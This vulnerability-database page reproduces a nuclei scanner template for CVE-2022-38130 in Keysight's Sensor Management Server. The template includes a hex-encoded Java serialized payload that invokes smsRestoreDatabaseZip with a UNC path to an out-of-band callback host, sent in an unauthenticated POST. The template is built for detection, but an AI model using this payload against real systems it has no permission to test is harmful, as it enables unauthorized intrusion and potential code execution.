Lucene search
K

KeySight RF - smsRestoreDatabaseZip UNC path to Remote Code Execution

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Unauthenticated attacker can cause remote code execution by supplying a UNC path to the database.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-38130
10 Aug 202220:16
attackerkb
Circl
CVE-2022-38130
11 Aug 202200:26
circl
CNNVD
Keysight Technologies Sensor Management Server SQL注入漏洞
10 Aug 202200:00
cnnvd
CVE
CVE-2022-38130
10 Aug 202216:05
cve
Cvelist
CVE-2022-38130
10 Aug 202216:05
cvelist
EUVD
EUVD-2022-40732
3 Oct 202520:07
euvd
NVD
CVE-2022-38130
10 Aug 202220:16
nvd
Prion
Design/Logic Flaw
10 Aug 202220:16
prion
Positive Technologies
PT-2022-24224
10 Aug 202200:00
ptsecurity
RedhatCVE
CVE-2022-38130
9 Jan 202610:57
redhatcve
Rows per page
id: CVE-2022-38130

info:
  name: KeySight RF - smsRestoreDatabaseZip UNC path to Remote Code Execution
  author: daffainfo,jjcho
  severity: critical
  description: |
    The com.keysight.tentacle.config.ResourceManager.smsRestoreDatabaseZip() method is used to restore the HSQLDB database used in SMS. It takes the path of the zipped database file as the single parameter. An unauthenticated, remote attacker can specify an UNC path for the database file (i.e., \\<attacker-host>\sms\<attacker-db.zip>), effectively controlling the content of the database to be restored.
  impact: |
    Unauthenticated attackers can control database content, potentially leading to data tampering or execution of malicious code.
  remediation: |
    Implement validation and sanitization of the database file path parameter to restrict to trusted locations.
  reference:
    - https://www.tenable.com/security/research/tra-2022-28
    - https://www.sonicwall.com/blog/keysight-rf-sensor-vulnerability
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-38130
    epss-score: 0.53389
    epss-percentile: 0.98858
    cwe-id: CWE-89
    cpe: cpe:2.3:a:keysight:sensor_management_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: keysight
    product: sensor_management_server
  tags: cve,cve2022,keysight,sensor_management_server,rce,vkev,oast,oob

variables:
  cmd: '\\\\{{interactsh-url}}\\test'
  serialized_str: '{{concat(hex_decode("aced0005737200356f72672e737072696e676672616d65776f726b2e72656d6f74696e672e737570706f72742e52656d6f7465496e766f636174696f6e5f6c8b9ff60a110a0200045b0009617267756d656e74737400135b4c6a6176612f6c616e672f4f626a6563743b4c000a6174747269627574657374000f4c6a6176612f7574696c2f4d61703b4c000a6d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000e706172616d6574657254797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870000000017400"), hex_decode(dec_to_hex(len(cmd))), cmd, hex_decode("70740015736d73526573746f726544617461626173655a6970757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb3420200007870"))}}'

http:
  - raw:
      - |
        POST /server/service/smsConfigServiceHttpInvoker HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-java-serialized-object

        {{serialized_str}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - "contains(interactsh_protocol, 'dns')"
          - "contains(content_type, 'application/x-java-serialized-object')"
          - "contains_all(body, 'org.springframework','RemoteInvocationResult')"
        condition: and
# digest: 4a0a00473045022100e24f3443ea99280765a651ddaff7ab9baa162d2328cc41313fbaa763ff61b090022042b3b278375a6575093e3ea76f1259d099bbbcf877dc6288831d909ee23e83a2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.53389
13